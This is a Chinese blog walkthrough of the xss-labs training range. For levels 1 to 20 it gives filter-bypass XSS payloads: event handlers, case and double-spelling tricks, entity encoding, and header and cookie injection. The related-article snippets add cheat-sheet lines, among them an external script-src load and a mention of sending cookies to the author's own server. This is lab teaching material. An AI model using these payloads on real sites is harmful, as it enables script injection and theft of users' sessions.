xss-labs

最新推荐文章于 2024-05-04 20:20:27 发布
最新推荐文章于 2024-05-04 20:20:27 发布
阅读量1k 收藏 25
点赞数 14
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80125214/article/details/136107951
版权
本文详细描述了一种通过逐步渗透,针对页面源码中的特殊字符转义和过滤机制,利用JavaScript代码、onfocus事件、URL编码等手段进行XSS注入的过程,展示了攻击者如何巧妙绕过防御,实现代码执行。
摘要由CSDN通过智能技术生成

level-01

查看源码,没有任何过滤,直接插入js代码即可

name=<script>alert()</script> 

level-02 

查看页面源码,和第一关一样插入js代码试试

<script>alert()</script>

发现没有成功 

查看页面源码,特殊符号被实体转义了

第一个test被实体转义了,而第二个没有,使用双引号闭合即可

">  <script>alert()</script>  <"

查看源码,发现进行了特殊符号的实体转义 

level-03 

 输入<script>alert()</script>后查看页面源代码,发现为单引号闭合

使用单引号闭合'><script>alert()</script><' 

还是不行,查看页面源代码<>符号被实体转义

所以在这儿使用onfocus事件绕过

onfocus事件在元素获得焦点时触发,最常与 <input>、<select> 和 <a> 标签一起使用,简单来说,onfocus事件就是当输入框被点击的时候,就会触发myFunction()函数,然后我们再配合javascript伪协议来执行javascript代码

 ' οnfοcus=javascript:alert() '

然后再点击输入框,触发onfoucus事件

level-04 

查看页面源码,为双引号闭合,使用了input标签,可以使用onfocyus事件

" οnfοcus=javascript:alert() "

查看这一关的源码,<>字符被过滤

level-05 

查看页面源码,为双引号闭合

" οnfοcus=javascript:alert() " ,发现之前的方法行不通,on被替换成了o_n

查看源码,过滤了js的标签还有onfocus事件,虽然str_replace不区分大小写,但是有小写字母转化函数,所以就不能用大小写法来绕过过滤了,只能新找一个方法进行xss注入,这里我们用a href标签法

添加一个标签得闭合前面的标签,构建payload 

"> <a href=javascript:alert()>xxx</a> <"

之后点击xxx

level-06 

查看页面源代码

输入关键字进行测试 ,发现过滤了很多

onfocus <script> <a href=javascript:alert()> 

尝试使用大小写绕过,发现大小写没有被过滤,所以这关可以使用大小写绕过

OnFocus <sCriPt> <a hReF=javascript:alert()>

 "> <ScriPt>alert()</ScriPt> <"

查看源码,这关没有对大小写进行过滤,所以可以使用大写进行绕过

 level-07

先尝试关键字,看哪些被过滤了" OnFocus <sCriPt> <a hReF=javascript:alert()>

可以发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过

"> <a hrehreff=javasscriptcript:alert()>x</a> <"

level-08

" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>

查看页面源码,看过滤了什么

可以发现,input标签添加了html实体转化函数还把双引号也给实体化了, 添加了小写转化函数,还有过滤掉了src、data、onfocus、href、script、"

查看源码,可以利用href的隐藏属性自动Unicode解码,插入一段js伪协议

 javascript:alert()

利用在线工具进行Unicode编码后得到

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;

level-09 

" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>

查看页面源码,看过滤了什么

查看源码,当false等于false的时候(就是传入的值没有http://)就会执行if,为了防止false===false,我们需要向传入的值里面添加http://并用注释符注释掉否则会执行不了无法弹窗,让函数strpos返回一个数字,构造payload 

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;/* http:// */

 level-10

" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>

查看页面源码,看什么被过滤了

特殊字符被实体化, input标内容被隐藏了,查看源码,这里是get传参t_sort,过滤掉了<>号,不能闭合插入标签,但是还能用onfocus事件,因为这里输入框被隐藏了,需要添加type="text",构造payload

?t_sort=" οnfοcus=javascript:alert() type="text

level-11 

通过查看页面源码<input>标签有四个值,都做了隐藏处理,不难看出,第四个名为t_ref的<input>标签是http头referer的参数(就是由啥地址转跳到这里的,http头的referer会记录有),我们先做个简单的测试来验证一下前面三个标签名,GET与POST传参都试一下看看

Get传参

?t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

没有赋值成功,尝试post传参

t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>

还是没能成功,使用burp suite抓包添加http头 

 Referer: " sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

查看页面源码,将<>过滤掉了

 使用Referer: " οnfοcus=javascript:alert() type="text

level-12

查看页面源码可知这关要修改ua头

用burp suite抓包修改ua头

" οnfοcus=javascript:alert() type="text

level-13 

通过查看页面源码可知,要修改的值为cookie

用F12打开该页面的cookie进行修改

" οnfοcus=javascript:alert() type="text

level-15

 ng-include指令就是文件包涵的意思,用来包涵外部的html文件,如果包涵的内容是地址,需要加引号

?src='/level1.php?name=<img src=1 οnmοuseοver=alert()>'

鼠标移动到图片上时就会触发弹窗

level-16 

 通过查看页面源码可知,test插入到了center标签中,不需要进行闭合,先测试什么被过滤掉了

?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> &#106; 

这里先是将字母小写化了,再把script替换成空格,最后将空格给实体化 

查看源码

空格被过滤掉了,空格可以用回车来代替绕过,回车的url编码是%0a,再配合上不用/的<img>、<details>、<svg>等标签

?keyword=<svg%0Aοnlοad=alert(1)>

level-17 

先测试一下关键字

?arg01=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()>; &arg02=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()>;

特殊符号发生转义,但是不需要闭合,点击后缀名为swf的文件,首先得用一个支持flash插件的浏览器打开本关(打开后会有个图片出来的,不支持flash插件浏览器就没有),如果不想下载的话,自己去后端改一下也行,将后端第十七关的代码(level17.php)指向的swf文件改为index.png

再重新打开第十七关,就会出现图片

arg01=a&arg02=b οnmοuseοver=alert(1)

level-18 

查看源码和上一关差不多,使用同样的方法

 arg01=a&arg02=b οnmοuseοver=alert(1)

level-19

通过查看页面源码,需要进行闭合

 

往Flash里面插入一段js代码,?arg01=version&arg02=<a href="javascript:alert()">here</a>

level-20 

与前面的关卡差不多,需要对swf反编译,构造payload

?arg01=id&arg02=xss\"))}catch(e){alert(1)}//%26width=123%26height=123

2301_80125214
关注
编码在XSS中的应用
Cwillchris的博客
07-10 790
一、使用编码绕过过滤-进行 XSS 注入1、Stage #15 十六进制绕过Stage #15 地址: https://xssquiz.int21h.jp/stage__15.php?sid=bdebf58d6cee62495a283af53d445e874dcfcad0输入的信息会在页面下方的黑色文本框中显示。尝试直接注入 payload: ">alert(document.dodomainmain);输入的双引号和左右尖括号全部转义成了实体字符编码。使用十六进制进行绕...
XSS三重URL编码绕过实例
04-11 1523
&#13; 遇到一个很奇葩的XSS,我们先来加一个双引号,看看输出:&#13; &#13; 双引号转义了,我们对双引号进行URL双重编码,再看一下输出:&#13; &#13; 依然被转义了,我们再加一层URL编码,即三重url编码,再看一下输出:&#13; &#13; URL编码被还原为双引号,并带入到html中输入。构造Payload实现弹窗&#13; &#13; ...
XSS 绕过常用语句
Mr.Huang_的博客
09-16 3174
XSS 绕过常用语句 写在最前面::: 下文中 alert 都可以由 prompt 代替 最常用的 XSS 漏洞测试代码: <script>prompt("XSS")</script> <SCRIPT SRC=http://damit5.ml/xss.js></SCRIPT> 在输入(Input)标签里 <INPUT type="text" value='<SCRIPT>alert("XSS")</SCRIPT>'>
反射xss触发技巧之引号转义逃逸
nextlubricate的博客
12-05 4076
不少xss防御机制较为成熟,但是引号转义却不转义转义符的情况,仍然可以进行逃逸并触发反射xss ,以最近的搜狗反射xss为例来讲(已修复) https://xxx.xxx.com/hospital/ncp/guide.html?channel=hainan\%27;alert(1);// 此处的单引号被转义,然而在单引号前加上转义符,可以导致单引号逃逸,成功闭合,触发反射xss ...
xss绕过尖括号和双括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 3062
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
解决xss转义导致转码的问题
weixin_39555954的博客
08-15 1503
解决xss转义导致转码的问题
xss-labs-master源码
07-06
"xss-labs-master"是一个专门设计的靶场,包含了20个级别的XSS练习,旨在帮助学习者深入理解和掌握XSS攻击的原理、类型以及防御策略。通过逐步解决这些精心设计的挑战,我们可以逐步提升对XSS攻击的理解,并提升安全...
xss-labs-master.rar
05-09
"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的理解和防御能力。这个靶机资源共分为二十个关卡,由浅入深,逐步引导用户掌握XSS攻防的核心技巧。 一、XSS...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
`xss-labs-master.zip`包含了一个专门用于学习和实践XSS注入的通关游戏或靶场,对于网络安全测试人员来说,这是一个极好的学习资源。 **XSS分类** 1. **存储型XSS**:也称为持久型XSS,攻击者将恶意脚本存入服务器...
安装xss-labs ppt手册
10-22
**XSS漏洞详解与XSS-Labs安装指南** XSS(Cross Site Scripting),即跨站脚本攻击,是网络安全领域常见的一种攻击方式。它允许攻击者通过注入恶意脚本到网页中,使得用户在不知情的情况下执行这些脚本,从而获取...
xss-labs通关.pdf
04-20
xss-labs靶场20关全通关攻略
Xss漏洞常见绕过过滤攻击场景
最新发布
chaottop的博客
05-04 2608
在某些情况下,后台作的过滤非常简单,只对一些特殊的字符串作黑名单过滤,导致可直接通过字母大小写绕过后台的过滤。如下例子
我的渗透笔记之XSS绕过技巧
xf555er的博客
03-03 1万+
1、单引号、双引号和尖括号之间的闭合。 有些标签例如,构造的payload应该为” >,那么组成的标签为<input value=""><script>alert(1)</script>" 2、尖括号被转义,利用注释符号和一些属性事件. 例如,构造payload为" οnclick=alert(1)//,组成的标签为<input value="" o...
XSS注入方式和逃避XSS过滤的常用方法
热门推荐
yinqiaohua的专栏
08-01 3万+
转自黑吧安全网http://www.myhack58.com/ web前端开发常见的安全问题就是会遭遇XSS注入,而常见的XSS注入有以下2种方式: 一、html标签注入 这是最常见的一种,主要入口为表单项(一般就是正则过滤不周全)、内联样式表(exploer) 正则过滤的解决办法,php一般会使用htmlspecialchars或者htmlentities函数进行
XSS绕过技术
suifengshiyu的专栏
03-27 2万+
本文转载自:http://www.2cto.com/Article/201211/168950.html Cross-SiteScripting(XSS)是一类出现在web应用程序上的安全弱点,攻击者可以通过XSS插入一些代码,使得访问页面的其他用户都可以看到,XSS通常是可以被看作漏洞的。它允许攻击者绕过安全机制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,co
XSS绕过单引号限制
xiaopan233的博客
05-28 9893
某视频网站,我在随处逛逛后发现了一个通过发送get请求来进行iframe连接的网页 有iframe。第一个想到的就是通过js伪代码来制造xss 所以我就简单写了一个alert 可以成功执行。没有过滤javascript:。那么我们尝试获取cookie。 也可以。并没有做过滤。那我们稍微修改一下。让cookie发到我的服务器不就可以盗取用户凭据了吗。 简单的写了个发送cooki...
html标签中onclick 嵌套单双引号XSS的处理方法
liduanwh的博客
02-18 3479
onclick="updateCategory(event, '${fn:replace(fn:replace(e:forHtmlContent(item.key), "'", "\\'"), '"', '&amp;quot;')}');" item.key的内容为 test &lt;IMG SRC=# onmouseover="alert('test')"&gt; 注意几点 1. &am
xss攻击突破转义_WEB安全之XSS攻击方式与防御方式
weixin_39520393的博客
11-21 894
上一期给大家简单介绍XSS以及其操作,本期将带大家了解XSS比较常见的攻击方式与防御方式,一起去了解一下~XSS 常见攻击方法1、绕过 XSS-Filter,利用 <> 标签注入 Html/JavaScript 代码;2、利用 HTML 标签的属性值进行 XSS 攻击。例如:<img src=“javascript:alert(‘xss’)”/>;(当然并不是所有的 Web...
xss-labs安装
07-28
XSS-labs是一个用于学习和测试跨站脚本攻击(XSS)的平台。根据引用\[1\],在学习了XSS的基础知识并完成了一些简单的XSS测试后,可以开始攻略XSS-labs。不过需要注意的是,对于XSS-labs,我们只需大致了解一些思路即可,因为在实际的应用中,很少会有这种复杂的情况,但在CTF比赛中可能会更常见。 根据引用\[2\],XSS-labs的安装和下载可以通过相关的渗透测试平台或者从官方网站获取。安装完成后,可以开始进行XSS攻击的实践。 在XSS-labs中,可以通过构造特定的payload来触发XSS漏洞。根据引用\[2\]和\[3\]的示例,可以使用ng-include或者src参数来构造包含XSS漏洞的URL。例如,可以构造一个类似于以下的payload来触发XSS漏洞: src='level1.php?name=<a type="text" href="javascript:alert(1)">' 或者 127.0.0.1/xss-labs/level15.php?src='level1.php?name=<a href="javascript:alert(/xss/)">' 通过构造合适的payload,可以利用XSS-labs平台进行XSS攻击的实践和学习。请注意,在实际应用中,XSS攻击是违法行为,请遵守法律法规并仅在合法授权的情况下进行安全测试。 #### 引用[.reference_title] - *1* *2* [渗透学习-靶场篇-XSS-labs(持续更新中)](https://blog.csdn.net/qq_43696276/article/details/127024861)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [xss-labs搭建及通关攻略](https://blog.csdn.net/K_ShenH/article/details/122765092)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值